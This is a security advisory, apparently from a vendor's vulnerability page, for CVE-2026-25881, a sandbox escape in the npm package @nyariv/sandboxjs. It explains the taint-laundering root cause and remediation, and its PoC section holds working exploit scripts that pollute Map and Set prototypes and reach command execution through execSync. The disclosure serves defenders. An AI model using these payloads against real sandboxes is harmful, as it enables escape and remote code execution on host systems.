CVE-2026-25881

CVE-2026-25881 is a critical-severity security vulnerability in @nyariv/sandboxjs (npm), affecting versions <= 0.8.30. It is fixed in 0.8.31.

Summary

A sandbox escape vulnerability allows sandboxed code to mutate host built-in prototypes by laundering the isGlobal protection flag through array literal intermediaries. When a global prototype reference (e.g., Map.prototype, Set.prototype) is placed into an array and retrieved, the isGlobal taint is stripped, permitting direct prototype mutation from within the sandbox. This results in persistent host-side prototype pollution and may enable RCE in applications that use polluted properties in sensitive sinks (example gadget: execSync(obj.cmd)).

Details

Root Cause:

The sandbox implements a protection mechanism using the isGlobal flag in the Prop class to prevent modification of global objects and their prototypes. However, this taint tracking is lost when values pass through array/object literal creation.

Vulnerable Code Path src/executor.ts(L559-L571):

addOps(LispType.CreateArray, (exec, done, ticks, a, b: Lisp[], obj, context, scope) => {
  const items = (b as LispItem[])
    .map((item) => {
      if (item instanceof SpreadArray) {
        return [...item.item];
      } else {
        return item;
      }
    })
    .flat()
    .map((item) => valueOrProp(item, context));  // <- isGlobal flag lost here
  done(undefined, items);
});

Exploitation Flow:

Sandboxed code: const m=[Map.prototype][0]
              ↓
Array creation: isGlobal taint stripped via valueOrProp()
              ↓
Prototype mutation: m.cmd='id' (host prototype polluted)
              ↓
Host-side impact: new Map().cmd === 'id' (persistent)
              ↓
RCE (application-dependent): host code calls execSync(obj.cmd)

Protection Bypass Location src/utils.ts(L380-L385):

set(key: string, val: unknown) {
  // ...
  if (prop.isGlobal) {  // <- This check is bypassed
    throw new SandboxError(`Cannot override global variable '${key}'`);
  }
  (prop.context as any)[prop.prop] = val;
  return prop;
}

When the prototype is accessed via array retrieval, the isGlobal flag is no longer set, so this protection is never triggered.

PoC

Prototype pollution via array intermediary:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const arr=[Map.prototype];
  const p=arr[0];
  p.polluted='pwned';
  return 'done';
`)().run();

console.log('polluted' in ({}), new Map().polluted);

Observed output: false pwned

Overwrite Set.prototype.has:

const Sandbox = require('@nyariv/sandboxjs').default;
const sandbox = new Sandbox();

sandbox.compile(`
  const s=[Set.prototype][0];
  s.has=isFinite;
  return 'done';
`)().run();

console.log('has overwritten:', Set.prototype.has === isFinite);

Observed output: has overwritten: true

RCE via host gadget (prototype pollution -> execSync):

const Sandbox = require('@nyariv/sandboxjs').default;
const { execSync } = require('child_process');
const sandbox = new Sandbox();

sandbox.compile(`
  const m=[Map.prototype][0];
  m.cmd='id';
  return 'done';
`)().run();

const obj = new Map();
const out = execSync(obj.cmd, { encoding: 'utf8' }).trim();
console.log(out);

Observed output: uid=501(user) gid=20(staff) groups=20(staff),...

Impact

This is a sandbox escape: untrusted sandboxed code can persistently mutate host built-in prototypes (e.g., Map.prototype, Set.prototype), breaking isolation and impacting subsequent host execution. RCE is possible in applications that later use attacker-controlled (polluted) properties in sensitive sinks (e.g., passing obj.cmd to child_process.execSync).

Affected Systems: any application using @nyariv/sandboxjs to execute untrusted JavaScript.

CVE-2026-25881 has a CVSS score of 9.0 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (0.8.31); upgrading removes the vulnerable code path.

Affected versions

@nyariv/sandboxjs (<= 0.8.30)

Security releases

@nyariv/sandboxjs → 0.8.31 (npm)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

  • Preserve isGlobal protection across array/object literal creation (do not unwrap Prop into raw values in a way that drops the global/prototype taint).
  • Add a hard block on writes to built-in prototypes (e.g., Map.prototype, Set.prototype, etc.) even if they are obtained indirectly through literals.
  • Defense-in-depth: freeze built-in prototypes in the host process before running untrusted code (may be breaking for some consumers).

Frequently Asked Questions

  1. What is CVE-2026-25881? CVE-2026-25881 is a critical-severity security vulnerability in @nyariv/sandboxjs (npm), affecting versions <= 0.8.30. It is fixed in 0.8.31.
  2. How severe is CVE-2026-25881? CVE-2026-25881 has a CVSS score of 9.0 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of @nyariv/sandboxjs are affected by CVE-2026-25881? @nyariv/sandboxjs (npm) versions <= 0.8.30 is affected.
  4. Is there a fix for CVE-2026-25881? Yes. CVE-2026-25881 is fixed in 0.8.31. Upgrade to this version or later.
  5. Is CVE-2026-25881 exploitable, and should I be worried? Whether CVE-2026-25881 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-25881 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-25881? Upgrade @nyariv/sandboxjs to 0.8.31 or later.

Other vulnerabilities in @nyariv/sandboxjs

CVE-2026-43898CVE-2026-34217CVE-2026-34211CVE-2026-34208CVE-2026-32723

Stop the waste.
Protect your environment with Kodem.